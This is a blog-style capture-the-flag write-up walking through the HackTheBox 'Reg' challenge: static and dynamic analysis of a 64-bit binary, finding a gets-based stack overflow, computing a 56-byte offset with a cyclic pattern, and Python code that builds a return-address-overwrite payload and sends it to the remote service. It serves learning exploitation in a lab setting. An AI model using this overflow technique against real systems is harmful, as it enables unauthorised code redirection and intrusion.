Introduction to Binary Exploitation | Reg HTB
What I know about the Binary Exploitation - 0x101
First of all, I'm fairly new to the binary exploitation world and don't have much experience in it. I want to learn more about binary exploitation, but before that I thought I'd outline what I know here. So if there is anything wrong, please be kind enough to reach out to me. 🤥🤥
Here I'm not going to explain basic registers, stack frames and assembly code in detail. You can study those on your own. To save some time on Google, click here for a detailed explanation of functions and the stack.😁😁
Enough talks 🤐🤐 Let me put in my two-penny worth..
Here I chose the binary file from the HackTheBox Reg challenge. You can also download that binary from here. Verify the MD5 checksum after downloading the file.
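If you prefer to do the checksum check from Python, a minimal sketch could look like this. The file name in the usage comment is only a placeholder, and the expected hash has to come from the download page.

```python
import hashlib


def md5_of_file(path, chunk_size=65536):
    """Return the hex MD5 digest of a file, reading it in chunks."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        # iter() with a sentinel keeps reading until read() returns b""
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


# Usage (file name is a placeholder, not taken from the challenge page):
#   print(md5_of_file("reg.zip"))
# Compare the printed value with the MD5 published next to the download.
```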
Now let's decompress the zip file. To do that we can use the unzip command. It will ask for the password. Type hackthebox and hit enter.
Let's start tackling the binary file now. Normally we take a quick walk around the binary before pulling out the big guns. So first things first, use the file command to check what kind of file we have on the desk.
The file command output reveals that the reg file is a 64-bit ELF (Executable and Linkable Format) binary and that it is not stripped. That means the symbol table is still in the file, so function names such as main stay visible to our tools. If the binary had also been compiled with gcc's -g flag, it would contain debug information as well. In a stripped binary, the symbols and debug information are removed, usually to reduce the file size. 🤐🤐
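To get a feeling for where the file command finds the "ELF 64-bit" part, here is a small sketch that reads the first bytes of the ELF identification header. It only looks at the magic, the class byte and the data-encoding byte. It does not try to detect whether the binary is stripped.

```python
def describe_elf(header: bytes) -> dict:
    """Decode the first bytes of the ELF identification (e_ident) array."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # Byte 4 (EI_CLASS): 1 = 32-bit, 2 = 64-bit
    elf_class = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown")
    # Byte 5 (EI_DATA): 1 = little-endian, 2 = big-endian
    encoding = {1: "little-endian", 2: "big-endian"}.get(header[5], "unknown")
    return {"class": elf_class, "data": encoding}


# Usage against the challenge binary:
#   with open("reg", "rb") as fh:
#       print(describe_elf(fh.read(16)))
```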
Next we have a fancy bash script called checksec to check the properties of executables and kernel security options (like GRSecurity and SELinux). We can run it with checksec filename, so let's have a look at what we've got..
The checksec script's results give us very important information about the binary file. I found a blog post which explains each flag in detail. Click here to view that blog. I have attached a part of it below.
Now you have some idea about the flags. We can also get that information using Radare2. You will learn more about this tool in the future.
That wraps up the basic static analysis. Now it's time to go ahead with dynamic analysis. First, make the file executable (chmod +x reg) and then run the binary (./reg).
The binary will ask us to Enter your name : and we can enter anything and hit enter. Boom! Nothing interesting at all.😂😂
Since it asks for input, we can check whether it has a buffer overflow vulnerability by feeding it far more data than it is likely to expect. The following python command generates the character "A" 200 times, and I redirect that output to a file called input.
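A minimal sketch of that step, assuming Python 3 and writing the file directly instead of using shell redirection. The trailing newline mimics what print would add.

```python
from pathlib import Path


def write_filler(path="input", count=200):
    """Write `count` capital A's plus a newline to `path` and return the bytes."""
    data = b"A" * count + b"\n"
    Path(path).write_bytes(data)
    return data


# Usage: creates a file called "input" in the current directory.
#   write_filler("input", 200)
```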
Now we can give that input file to our binary as its input.😵😵 Or we can simply copy the output above and paste it into the program when it asks us to Enter your name :
Yeah! The binary hit a Segmentation fault.
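The same check can be scripted. The sketch below assumes a Linux-like system, where Python's subprocess module reports a process killed by a signal as a negative return code. The helper names are my own.

```python
import signal
import subprocess


def run_with_input(cmd, data, timeout=5):
    """Run `cmd`, feed `data` to its stdin and return the exit status."""
    proc = subprocess.run(
        cmd,
        input=data,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        timeout=timeout,
    )
    return proc.returncode


def died_from_segfault(returncode):
    """On POSIX, a child killed by signal N has return code -N."""
    return returncode == -signal.SIGSEGV


# Usage against the challenge binary:
#   rc = run_with_input(["./reg"], b"A" * 200 + b"\n")
#   print("segfault!" if died_from_segfault(rc) else f"exit status {rc}")
```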
"In computing, a segmentation fault or access violation is a fault, or failure condition, raised by hardware with memory protection, notifying an operating system the software has attempted to access a restricted area of memory. On standard x86 computers, this is a form of general protection fault" source
Simply put, our oversized input overwrote memory the program relies on, which strongly suggests a buffer overflow. Let's pull out the big guns now.😎😎
Here I used Radare2 to analyze the binary file first. So... let's load the binary into radare2:
radare2 ./reg
Then type aaa and hit enter to analyze all referenced code. If you have any doubts about what the aaa command exactly does, click here. 👈👈
Once the analysis is done, we can use the afl command to list all the functions in the binary file. The final output will look like this. 👇👇
Click here for Radare2 cheat sheet.
As you can see here, there are 3 functions which are very interesting. One is called main; without question it is the main function of the program. But what about the other two functions? 🤷‍♂️🤷‍♂️ So let's keep that in our back pocket for a while and move on.
Now I need to know the program entry points [ie], the address of main [iM] and which strings [iz] are inside this binary file.
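Outside radare2, the idea behind listing strings can be sketched in a few lines of Python. Note the difference: this sketch scans the whole file for runs of printable ASCII (closer to the classic strings tool), while iz looks at the data sections. The minimum length of 4 is an arbitrary choice.

```python
import re


def printable_strings(blob: bytes, min_len: int = 4):
    """Return (offset, text) pairs for runs of printable ASCII in `blob`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(blob)]


# Usage against the challenge binary:
#   with open("reg", "rb") as fh:
#       for offset, text in printable_strings(fh.read()):
#           print(hex(offset), text)
```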
Now the progress is pretty interesting. We found two strings, Congratulations! and flag.txt
At this point we can guess that there is a function in this binary which uses those two strings and that it will expose the flag as well. Let's keep digging deeper... We can use / to search for any string inside the binary file. Say you want to know where the Congratulations! string sits inside the binary; you can run the following command.👇👇
That doesn't give us enough information. So, let's move on to Visual mode in radare2 by typing V [uppercase] and hitting enter. Then use v [lowercase] to switch between selecting functions, variables and xrefs. Navigation can be done using HJKL or the arrow keys and the PgUp/PgDown keys. If you are lost, press ? to get help.😋😋
After digging through the functions we found two interesting points.
- The binary reads its input using the gets function.
- The string Congratulations! is inside the sym.winner function.
First of all, let me tell you a short story about gets. The C programming language has some commonly used functions that are vulnerable because they allow buffer overflows. Click here to see more detailed information. gets is one of those functions. Let's have a look at the manual page for gets
The 👇 description from the manual page says Never use this function.
Here is the bug explained simply: gets keeps reading until it sees a newline or end of file and has no idea how big the destination buffer is, so a longer line simply runs past the end of the buffer. If you wish to know more details about that bug, click here to view CWE-242 (Use of Inherently Dangerous Function)
The story ends. 😟😟
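To picture what an unchecked copy does to a stack frame, here is a toy model in Python. It is only a simulation: the 16-byte buffer and the addresses are made up for illustration and are not taken from the reg binary. The frame is modelled as buffer, then saved RBP, then return address.

```python
import struct

BUF_SIZE = 16  # made-up buffer size, for illustration only


def new_frame(saved_rbp, return_address):
    """Toy frame layout: [buffer][saved RBP][return address]."""
    return bytearray(b"\x00" * BUF_SIZE + struct.pack("<QQ", saved_rbp, return_address))


def unchecked_copy(frame, line):
    """Copy the whole line starting at the buffer, with no length check (like gets)."""
    frame[0:len(line)] = line


def return_address(frame):
    """Read back the 8-byte return address slot."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


frame = new_frame(saved_rbp=0x7FFD0000, return_address=0x401000)
unchecked_copy(frame, b"A" * 10)                      # fits: nothing bad happens
short_input_ret = return_address(frame)
unchecked_copy(frame, b"A" * (BUF_SIZE + 8) + struct.pack("<Q", 0xDEADBEEF))
long_input_ret = return_address(frame)                # return address is now ours
print(hex(short_input_ret), hex(long_input_ret))
```

The short input leaves the return address alone, while the long one replaces it with a value we picked. That is the whole trick we are about to play on the real binary.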
Let's take a look at what's inside the winner function. Seek to the function using s sym.winner and then use the pdf command to see the function disassembly.
All right, the function opens the file called flag.txt, and we have to reach it, and so read flag.txt, by taking advantage of the buffer overflow in the gets function. Cool! 😎😎
So now we need to find out which part of our input ends up in the instruction pointer, since that is what caused the segmentation fault. To do that, I am going to use GDB. But since I'm not a master of the assembly world, I used a plugin called pwndbg, which makes debugging with GDB suck less.😁😁 You can download it from here.
Then we can use the following command to open pwndbg with the binary file.
gdb-pwndbg reg
We can use the run command to run the program inside pwndbg.
We can also use info functions to list all the functions.
In the beginning, we used a simple python script to make a pattern consisting only of the letter "A". But here we can use the cyclic command to create a string pattern in which every 4-byte chunk is unique, so any chunk tells us its position.
Let's make a pattern of length 150 using cyclic 150
Then copy the pattern to the clipboard, run the binary file and paste the pattern when it asks for input. Finally hit enter. pwndbg will show everything you need to know.
You will see that we have crashed the program, and now we need to find at what offset we overflowed into the instruction pointer (also known as RIP). Since this is a 64-bit binary, the pattern never shows up in RIP: the bytes we wrote do not form a valid (canonical) address, so the ret instruction faults before RIP is loaded. Therefore, we need to get the offset from somewhere else. As you can see here, the stack pointer (RSP) currently points at a value starting with oaaa, and that is the address ret was about to load into RIP.
Now we need to get the offset value. You can get the offset value in two different ways.
- You can take the last 4 bytes in RBP, which is naaa in this case; whatever comes right after that is our RIP.
- Or you can take the first 4 bytes at RSP, which is oaaa; that is our RIP.
To look up the offset value we can use cyclic -l <pattern> as follows.👇👇
So now we know the offset value. We have to enter 56 bytes of padding first, and the next 8 bytes then overwrite the saved return address that ret pops into RIP.
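The lookup can also be reproduced without pwndbg. The sketch below generates a de Bruijn style pattern, assuming the lowercase alphabet and 4-byte chunks, which is consistent with the oaaa and naaa values seen above. The function names are mine and only mirror the idea of the cyclic command.

```python
import string
from itertools import islice


def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every length-n chunk appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, alphabet=string.ascii_lowercase, n=4):
    """Return the first `length` characters of the pattern."""
    return "".join(islice(de_bruijn(alphabet, n), length))


def cyclic_find(chunk, length=150):
    """Return the offset of `chunk` inside the pattern, or -1 if absent."""
    return cyclic(length).find(chunk)


pattern = cyclic(150)
print(pattern[:20])          # aaaabaaacaaadaaaeaaa
print(cyclic_find("oaaa"))   # 56 -> first bytes at RSP, i.e. the return address
print(cyclic_find("naaa"))   # 52 -> last 4 bytes of RBP, so RIP starts at 52 + 4
```

Both ways from the list above agree: oaaa sits at offset 56, and naaa sits at offset 52 with the return address starting 4 bytes later.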
Let's check if we are correct. Create a fake flag called flag.txt in the current working directory.
Then we need to find the address of the winner function. Again, I used radare2 to get that address.
Now let's create the payload using a simple python script. What it does is print 56 "A"s followed by the address of the winner function, which is where we want to return to. Here I used python pwntools to pack that address in little-endian format. You can also use the struct library to do so.
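A minimal sketch of the struct variant. The address below is a hypothetical placeholder, not the real address of winner; replace it with the one radare2 shows for your copy of the binary.

```python
import struct

OFFSET = 56             # padding length found with cyclic -l
WINNER_ADDR = 0x401206  # HYPOTHETICAL placeholder, use the address radare2 reports


def build_payload(target, offset=OFFSET):
    """Padding up to the saved return address, then the target as 8 little-endian bytes."""
    return b"A" * offset + struct.pack("<Q", target)


payload = build_payload(WINNER_ADDR)
print(len(payload))   # 64 bytes: 56 of padding + 8 of address

# Usage: write the payload to a file and feed it to the binary, e.g.
#   with open("payload", "wb") as fh:
#       fh.write(payload + b"\n")
#   ./reg < payload
```

Writing bytes to a file avoids the encoding surprises you can get when printing non-ASCII bytes to the terminal in Python 3.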
Let's check by feeding that payload to the binary file as input.
Voila! We got our fake flag. It means the payload works. Let's check whether we can use it against the remote server using the netcat tool.
Aaaaand it was successful. 🤘🤘
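If you would rather script the remote step than pipe into netcat, a rough sketch with the standard socket module could look like this. The host and port in the usage comment are placeholders (use the instance details HackTheBox gives you), and the helper name is my own.

```python
import socket


def send_payload(host, port, payload, timeout=5.0):
    """Connect, send the payload plus a newline, and return everything sent back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(payload + b"\n")
        conn.shutdown(socket.SHUT_WR)  # tell the service we are done sending
        while True:
            try:
                data = conn.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Usage (host and port are placeholders, payload is the 64-byte payload built earlier):
#   reply = send_payload("203.0.113.10", 31337, payload)
#   print(reply.decode(errors="replace"))
```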
I hope you enjoyed the writeup. And if there is anything wrong, please be kind enough to send me feedback because, you know, I'm still finding my feet in the assembly world.🤧🤧
Next time we will dig into the pwntools library more, because it has a lot of power when it comes to binary exploitation. I mean, things can be automated, which makes them easier than doing everything manually.
Ciao.🙋♂️🙋♂️
Find me on @twitter